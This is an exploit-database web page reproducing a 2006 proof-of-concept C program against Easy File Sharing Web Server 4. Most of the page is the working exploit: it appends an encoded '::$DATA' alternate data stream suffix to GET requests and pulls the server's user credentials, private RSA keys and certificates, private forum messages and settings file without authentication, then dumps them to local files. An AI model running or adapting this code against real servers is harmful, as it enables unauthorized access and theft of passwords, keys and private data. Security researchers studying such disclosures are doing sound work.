Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
0-day Alternative File Stream Exploit for Easy File Share Server 4 - exploit.company
header-logo
Suggest Exploit
vendor:
Easy File Share Server
by:
Greg Linares
N/A
CVSS
N/A
Information Stealer
Unknown
CWE
Product Name: Easy File Share Server
Affected Version From: Easy File Share Server 4
Affected Version To: Easy File Share Server 4
Patch Exists: NO
Related CWE: Unknown
CPE: a:easy_file_share_server:easy_file_share_server:4
Metasploit:
Other Scripts:
Platforms Tested:
2006

0-day Alternative File Stream Exploit for Easy File Share Server 4

Exploit allows malicious users to grab files from the server without being authenticated completely bypassing security.

Mitigation:

Unknown
Source

Exploit-DB raw data:

/*
===================================================================
0-day Alternative File Stream Exploit for Easy File Share Server 4
===================================================================
Exploit allows malicious users to grab files from the server without
being authenticated completely bypassing security.


0-day Easy File Sharing Web Server v4.0 Information Stealer
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS Web Server's Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.

Discovered and Reported: 10-30-2006

Usage: exploit <hostname/IP> [port 80=default] [Method see below]

--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.[Default]
2 = Gather Private RSA Key and Certificates for server.
3 = Gather Private Messages used by Forum Users on the server
4 = Gather Server Settings File and SMTP server info.

*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>		/* Win32 API */
#include <wininet.h>		/* WinInet API */
int mthd;
unsigned short httpport;
char exploit[512], exploit2[512], exploit3[512], exploit4[512];
char logmsg[512];
char endmsg[512];
HINTERNET inet;			/* WinInet Internet Handle */
FILE *file;

void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{

  	HINTERNET connection;		/* Connection Handle */
    HINTERNET request;			/* Request Handle */
    unsigned long flags;		/* HttpOpenRequest Flags */

	char buffer[BUFSIZ];
    unsigned long len;


	printf("HOST: %s\n", host);
	printf("PORT: %i\n", httpport);

	if ((connection = InternetConnect(inet, host, httpport,
				      NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
	    == NULL)
	{
		printf("Failed to Connect...Exiting\n");
		InternetCloseHandle(inet);
		fclose(file);
		exit(1);
	}

	flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
	    INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
	    INTERNET_FLAG_RELOAD;

	strcat(exp, "%3A%3A%24%44%41%54%41");

	request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
	if (request == NULL)
	{
		printf("HTTP Open Request failed....Exiting\n");
		InternetCloseHandle(connection);
		InternetCloseHandle(inet);
		fclose(file);
		exit(1);
	}
	if (!HttpSendRequest(request, NULL, 0, NULL, 0))
	{
		printf("HTTP Send Request failed....Exiting\n");
		InternetCloseHandle(request);
		InternetCloseHandle(connection);
		InternetCloseHandle(inet);
		fclose(file);
		exit(1);
	}
	printf("Exploit Sent...Dumping HTTP Return Packet...");
	sleep(1000);

	while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
	{
		fwrite(buffer, len, 1, file);
		if (fwrite(buffer, len, 1, stdout) < 1)
		{
				printf("Error Outputting HTTP Return Packet\n");
		}
	}
	InternetCloseHandle(request);
    InternetCloseHandle(connection);
}


int main (int argc, char *argv[])
{

	printf("\n=========================================================================\n");
	printf("0-day Easy File Sharing Web Server v4.0 Information Stealer\n");
	printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
	printf("This tool demonstrates EFS Web Server's Vulnerability to Alternative\n");
	printf("Data Stream GET requests which allow unauthorized users to download server \n");
	printf("critical files.\n");
	printf("Discovered and Reported: 10-30-2006\n");
	printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
	printf("--------PoC Methods:-----\n");
	printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
	printf("2 = Gather Private RSA Key and Certificates for server.\n");
	printf("3 = Gather Private Messages used by Forum Users on the server\n");
	printf("4 = Gather Server Settings File and SMTP server info.\n");
	printf("============================================================================\n");


    inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (inet == NULL)
	{
		printf("Error accessing InternetOpen API - Exiting...\n");
		exit(1);
	}
	if (argc < 2)
	{
		printf("Invalid # of arguments...Exiting\n");
		exit(1);
	}
	if (atoi(argv[3]) > 4)
	{
		mthd = 1;
	}
	if (atoi(argv[3]) <= 0)
	{
		mthd = 1;
	}
	mthd = atoi(argv[3]);

	/* Set Up Exploits */
	switch(mthd)
	{
    	case 1:
			file = fopen("Accounts.txt","a+");
			sprintf(exploit, "%s", "%75%73%65%72%2E%73%64%62");
			sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
			break;
		case 2:
			file = fopen("RSAKeys.txt", "a+");
			sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
			sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
			break;
		case 3:
			file = fopen("Messages.txt", "a+");
			sprintf(exploit, "%s", "%6D%73%67%31%2E%73%64%62");
			sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
			break;
		case 4:
			file = fopen("Server.txt", "a+");
			sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
			sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
			break;
	}



	sprintf(logmsg, "%s", argv[1]);
	sprintf(logmsg, "%s", "\r\n\r\n\r\n");
	fwrite(logmsg, strlen(logmsg), 1, file);
	httpport = atoi(argv[2]);
	ExploitHTTP(inet, argv[1], exploit);
	if (mthd == 3)
	{
		printf("\n\n Sending 2nd Exploit...\n");
		strcat(exploit2, "%6D%73%67%32%2E%73%64%62");
		ExploitHTTP(inet, argv[1], exploit2);
		printf("\n\n Sending 3rd Exploit...\n");
		strcat(exploit3, "%6D%73%67%33%2E%73%64%62");
		ExploitHTTP(inet, argv[1], exploit3);
		printf("\n\n Sending final Exploit...\n");
		strcat(exploit4, "%6D%73%67%34%2E%73%64%62");
		ExploitHTTP(inet, argv[1], exploit4);
	}
	if (mthd == 2)
	{
		printf("\n\n Sending 2nd Exploit...\n");
		strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
		ExploitHTTP(inet, argv[1], exploit2);
		printf("\n\n Sending final Exploit...\n");
		strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
		ExploitHTTP(inet, argv[1], exploit3);
	}
	fclose(file);

    Sleep(500);
    InternetCloseHandle(inet);
	printf("\n\n===================================================\n");
	printf("%s\n", endmsg);
	printf("Proof Of Concept Exploit by Greg Linares\n");
	printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
    return 0;

}

// milw0rm.com [2006-10-30]

Navigation

Suggest Exploit

Services By CQR